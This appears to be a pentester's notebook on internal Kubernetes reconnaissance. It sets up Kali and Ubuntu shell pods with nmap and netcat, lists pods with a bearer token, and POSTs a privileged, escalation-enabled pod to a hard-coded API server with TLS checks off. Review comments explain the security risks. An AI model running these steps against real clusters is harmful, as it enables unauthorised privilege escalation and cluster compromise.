Internal recon
Environment variables
Service Account token
Namespace
Test pod = Kali
kali.yaml
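# kali.yaml — long-lived Kali pod used as a shell inside the cluster.
# Replace <some-valid-namespace> with a namespace the caller may create pods in;
# the same value has to be exported as $NAMESPACE for the kubectl exec step.
apiVersion: v1
kind: Pod
metadata:
  name: kali
  namespace: <some-valid-namespace>
spec:
  containers:
    - name: kali
      # Public image with no tag pinned, so it resolves to :latest and its
      # contents change between pulls; pin a tag or digest for repeatability.
      image: "kalilinux/kali-rolling"
      # No-op process that keeps the container running so it can be exec'd into.
      command:
        - sleep
        - infinity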
# Open an interactive shell in the kali pod ($NAMESPACE must match kali.yaml).
kubectl exec -it kali --namespace $NAMESPACE -- /bin/sh
# Everything below runs inside the pod.
/bin/bash
apt update
apt install -y nmap
apt install -y netcat-traditional
Test pod = Ubuntu
ubuntu.yaml
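# ubuntu.yaml — long-lived Ubuntu pod with privilege escalation left enabled.
# Replace <some-valid-namespace> with a namespace the caller may create pods in;
# the same value has to be exported as $NAMESPACE for the kubectl exec step.
apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  namespace: <some-valid-namespace>
spec:
  containers:
    - name: ubuntu
      # Untagged public image (resolves to :latest); pin a tag or digest.
      image: ubuntu
      securityContext:
        # Lets processes in the container gain more privileges than their
        # parent (setuid binaries, file capabilities). The Pod Security
        # Standards "restricted" profile requires this to be false, so a
        # namespace enforcing that profile rejects this manifest.
        allowPrivilegeEscalation: true
      # No-op process that keeps the container running so it can be exec'd into.
      command:
        - sleep
        - infinity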
# Open an interactive shell in the ubuntu pod ($NAMESPACE must match ubuntu.yaml).
kubectl exec -it ubuntu --namespace $NAMESPACE -- /bin/sh
# Everything below runs inside the pod.
/bin/bash
apt update
apt install -y curl
apt install -y jq
apt install -y vim
API
List pods
# List pod names in $NAMESPACE through the API server, authenticating with the
# bearer token in $TOKEN.
# --insecure disables TLS verification of the API server, so the response could
# come from anything on the network path. From inside a pod the cluster CA is
# normally mounted at /var/run/secrets/kubernetes.io/serviceaccount/ca.crt and
# can be passed with --cacert instead.
curl --insecure --header "Authorization: Bearer $TOKEN" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods/ | jq '.items[].metadata.name'
Create pod
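# Write the pod manifest to test-pod.json. The heredoc delimiter is unquoted,
# so shell expansion applies inside it; the body contains no $ so nothing expands.
# The "namespace" field must equal $NAMESPACE in the request URL below, or the
# API server rejects the POST as a namespace mismatch.
cat > test-pod.json <<EOF
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {
    "name": "ubuntu",
    "namespace": "<some-valid-namespace>"
  },
  "spec": {
    "containers": [
      {
        "name": "ubuntu",
        "image": "ubuntu",
        "command": [
          "sleep",
          "infinity"
        ],
        "securityContext": {
          "allowPrivilegeEscalation": true,
          "privileged": true
        }
      }
    ]
  }
}
EOF
# NOTE(review): this manifest reuses the pod name "ubuntu" from ubuntu.yaml; if
# that pod already exists in the namespace the POST fails with 409 AlreadyExists.
# "privileged": true runs the container with host-level capability and device
# access; both the "baseline" and "restricted" Pod Security Standards reject it,
# so the request only succeeds where no such admission policy is enforced.
# -k disables TLS verification of the API server (the cluster CA normally mounted
# at /var/run/secrets/kubernetes.io/serviceaccount/ca.crt can be passed with
# --cacert instead). -v echoes the request headers, including the Authorization
# header with the bearer token, to stderr — keep that output out of logs.
curl -k -v -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods -d@test-pod.json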